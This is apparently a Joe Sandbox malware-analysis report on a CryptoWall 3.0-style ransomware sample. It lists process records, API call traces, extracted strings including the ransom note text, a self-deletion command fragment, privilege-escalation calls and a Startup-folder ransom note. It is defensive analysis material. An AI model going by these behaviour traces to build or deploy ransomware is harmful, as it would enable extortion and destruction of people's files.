                                                                                                                          Start time:15:11:01
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x13fe30000
                                                                                                                          File size:3'151'128 bytes
                                                                                                                          MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:21
                                                                                                                          Start time:15:11:07
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt
                                                                                                                          Imagebase:0xff580000
                                                                                                                          File size:193'536 bytes
                                                                                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false


                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:98.1%
                                                                                                                            Signature Coverage:19.4%
                                                                                                                            Total number of Nodes:516
                                                                                                                            Total number of Limit Nodes:14

                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000067,scan,00000064), ref: 0041D519
                                                                                                                            • LoadStringW.USER32(?,0000006D,SCAN,00000064), ref: 0041D525
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E8D6
                                                                                                                              • Part of subcall function 0041E8A0: LoadCursorW.USER32 ref: 0041E8E2
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E906
                                                                                                                              • Part of subcall function 0041E8A0: RegisterClassExW.USER32(00000030), ref: 0041E90F
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0041D532
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 0041D56A
                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0041D589
                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0041D5A0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,004C8B20), ref: 0041D5C1
                                                                                                                            • CoCreateInstance.OLE32(004365C8,00000000,00000001,00431338,?), ref: 0041D627
                                                                                                                            • CoCreateInstance.OLE32(004365D8,00000000,00000001,00431328,?), ref: 0041D63D
                                                                                                                            • ExitProcess.KERNEL32 ref: 0041D68E
                                                                                                                            • _memset.LIBCMT ref: 0041D6AA
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041D789
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041D79D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041D7AA
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,004CEB20), ref: 0041D7BD
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,004D0B20), ref: 0041D7C9
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,004D2B20), ref: 0041D7D5
                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,004D4B20,00000005,00000000), ref: 0041D7E0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,004CAB20), ref: 0041D82E
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,004CCB20), ref: 0041D83A
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004C6B20,00001000), ref: 0041D847
                                                                                                                            • DeleteFileW.KERNEL32(004C4B20), ref: 0041D87D
                                                                                                                              • Part of subcall function 0041E7A0: CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                              • Part of subcall function 0041E7A0: SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                              • Part of subcall function 0041E7A0: ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                              • Part of subcall function 0041E7A0: CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041D89A
                                                                                                                              • Part of subcall function 0041E810: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                              • Part of subcall function 0041E810: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,435-3435-4546), ref: 0041D915
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D91B
                                                                                                                            • _memset.LIBCMT ref: 0041D937
                                                                                                                            • GetVersionExW.KERNEL32(0043C728), ref: 0041D94E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DA02
                                                                                                                            • _memset.LIBCMT ref: 0041DA17
                                                                                                                            • __wfopen_s.LIBCMT ref: 0041DA3D
                                                                                                                            • _fprintf.LIBCMT ref: 0041DA6B
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DAA2
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0041E5B0,00000000,00000000,00000000), ref: 0041DABE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00013780,00000000,00000000,00000000), ref: 0041DACA
                                                                                                                            • SetThreadPriority.KERNEL32(00000000,000000F1), ref: 0041DAD1
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DAE0
                                                                                                                            • _memset.LIBCMT ref: 0041DAFD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB4D
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB97
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DBED
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DBFE
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0001D4C0), ref: 0041DC0C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DC27
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DC2C
                                                                                                                              • Part of subcall function 0041E050: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                              • Part of subcall function 0041E050: GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                              • Part of subcall function 0041E050: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                              • Part of subcall function 0041E050: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            • %s%s%s%S, xrefs: 0041DA65
                                                                                                                            • \RESTORE_FILES.BMP, xrefs: 0041DBB4
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041D981
                                                                                                                            • Wow64DisableWow64FsRedirection, xrefs: 0041D797
                                                                                                                            • \RESTORE_FILES.TXT, xrefs: 0041DB1D
                                                                                                                            • Wow64RevertWow64FsRedirection, xrefs: 0041D79F
                                                                                                                            • .txt, xrefs: 0041D80D
                                                                                                                            • SeDebugPrivilege, xrefs: 0041D894
                                                                                                                            • open, xrefs: 0041DB41, 0041DB90, 0041DBE6
                                                                                                                            • \Recovery_File_, xrefs: 0041D7E6
                                                                                                                            • scan, xrefs: 0041D511
                                                                                                                            • 435-3435-4546, xrefs: 0041D90E
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041D9DB
                                                                                                                            • KERNEL32, xrefs: 0041D784
                                                                                                                            • :Zone.Identifier, xrefs: 0041D861
                                                                                                                            • SCAN, xrefs: 0041D51D
                                                                                                                            • \RESTORE_FILES.HTML, xrefs: 0041DB6A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$Path$FolderThread$File$Load$ExecuteShell_memset$ModuleNameObjectProcessSingleWait$AddressHandleIconInitializeInstanceProcStringToken$AllocateCheckClassCloseCurrentCursorDeleteEnvironmentErrorExitFreeLastLookupMembershipMutexOpenPointerPriorityPrivilegeReadRegisterShortSpecialValueVariableVersion__wfopen_s_fprintf
                                                                                                                            • String ID: %s%s%s%S$.txt$435-3435-4546$:Zone.Identifier$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$KERNEL32$SCAN$SeDebugPrivilege$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\RESTORE_FILES.BMP$\RESTORE_FILES.HTML$\RESTORE_FILES.TXT$\Recovery_File_$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$open$scan
                                                                                                                            • API String ID: 1728785742-2454956091
                                                                                                                            • Opcode ID: b9b3065ef54fea5832a63d74bc4c9a3bc535528440381a5f7b6ab5b4d906ee62
                                                                                                                            • Instruction ID: b9353f63490a9340779b0bdb0cd734671b1939fc783d41848026e497fe5a03ea
                                                                                                                            • Opcode Fuzzy Hash: b9b3065ef54fea5832a63d74bc4c9a3bc535528440381a5f7b6ab5b4d906ee62
                                                                                                                            • Instruction Fuzzy Hash: C502D7B0A40318BEE720EB609C86FEA7678EB58744F50459BF604B61D1D7B86D80CB6D

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 0041E871
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041E87B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3874597930-0
                                                                                                                            • Opcode ID: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction ID: 269530095bf515f302acf201c8fd37964e73f2dce42f1b02fb8cc585cf08c6bc
                                                                                                                            • Opcode Fuzzy Hash: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction Fuzzy Hash: DA01B530A002089BDB14DFE4DD46BAEB7B8FF48700F50406DE606A7380DB746944CB99
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 003B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                              • Part of subcall function 003B1DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: f7b01f3da82970626e35ce751784ccd82f0bf63adb196079f7b6b43d082fefa5
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: 30914A72E14628CBDB1ECA68CC617FEB676FBC0308F59866DD307ABD45DB7459408A40
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 003B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                              • Part of subcall function 003B1DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d11414774b37c3b90990411d8fa416d26fee2612cd36c7dbb02eddf4be44f503
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 89612C72E14328CFDB1ACE64CC917EDB776FB80308F5586AEC106ABA44DB7059459F80

                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000057,75DC55D0,?,0041D8BB,?), ref: 0041DDED
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,0041D8BB,00000000,75DC55D0,?,0041D8BB,?), ref: 0041DE01
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,0041D8BB,?), ref: 0041DE08
                                                                                                                            • GetLastError.KERNEL32(?,0041D8BB,?), ref: 0041DE12
                                                                                                                            • CloseHandle.KERNEL32(0041D8BB), ref: 0041DE9C
                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,0041D8BB,?), ref: 0041DEAA
                                                                                                                            • SetLastError.KERNEL32(?,?,0041D8BB,?), ref: 0041DEBD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Process$CloseCurrentFreeHandleLocalOpenToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1977215774-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DF18
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,0043CD18,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • PathFindFileNameW.SHLWAPI(004C6B20), ref: 0041DF31
                                                                                                                              • Part of subcall function 0041F000: __strftime_l.LIBCMT ref: 0041F015
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041DF6E
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,75DC55D0,?,0041D906), ref: 0041DF76
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DF7F
                                                                                                                            • CopyFileW.KERNEL32 ref: 0041DFCC
                                                                                                                            • _memset.LIBCMT ref: 0041DFD7
                                                                                                                            • CreateProcessW.KERNEL32 ref: 0041E015
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Create_memset$CloseCopyCountErrorFindHandleLastNamePathProcessSleepTick__strftime_l_rand
                                                                                                                            • String ID: %s\%s$%s\svc%s.exe$D
                                                                                                                            • API String ID: 2352187395-2913687874

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$EnvironmentExecuteFileModulePathShellShortVariable
                                                                                                                            • String ID: >> NUL$/c del $ComSpec
                                                                                                                            • API String ID: 1296078269-547624796

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph starting at block 3b1dd0 (image not preserved); calls shown: VirtualAlloc, CreateThread, RtlExitUserThread]
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph starting at block 3b137c (image not preserved); call shown: VirtualProtect]
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B1666
                                                                                                                              • Part of subcall function 003B172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph starting at block 3b13bb (image not preserved); call shown: VirtualProtect]
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph starting at block 3b1639 (image not preserved); call shown: VirtualProtect]
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B1666
                                                                                                                              • Part of subcall function 003B172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 409 41e7a0-41e7c6 CreateFileW 410 41e804-41e80a 409->410 411 41e7c8-41e7f4 SetFilePointer ReadFile CloseHandle 409->411 411->410 412 41e7f6-41e7f9 411->412 412->410 413 41e7fb-41e803 412->413
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                            • ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandlePointerRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4133201480-0

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 671 3b1013-3b109c call 3b0af8 * 2 call 3b0c47 LoadLibraryA 684 3b109e-3b10ab 671->684 685 3b10ad-3b10b8 671->685 687 3b10ba-3b10f7 684->687 685->687 692 3b124e-3b1264 687->692 693 3b10fd-3b1107 687->693 701 3b1299-3b12a8 692->701 702 3b1266-3b1279 692->702 694 3b1109-3b1125 693->694 695 3b1127-3b1142 693->695 704 3b1147-3b1163 call 3b116e 694->704 695->704 705 3b127b-3b127e 702->705 712 3b1165-3b11d3 call 3b0af8 * 2 call 3b0c47 704->712 713 3b11d4-3b11f8 704->713 706 3b1280-3b1293 705->706 707 3b1295-3b1297 705->707 706->705 707->701 712->713 722 3b11fa-3b1206 713->722 723 3b123e-3b1249 713->723 725 3b1208-3b1216 722->725 726 3b1236-3b123b 722->726 727 3b1218-3b121b 725->727 726->723 729 3b122d-3b1231 727->729 730 3b121d-3b122b 727->730 729->726 730->727
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
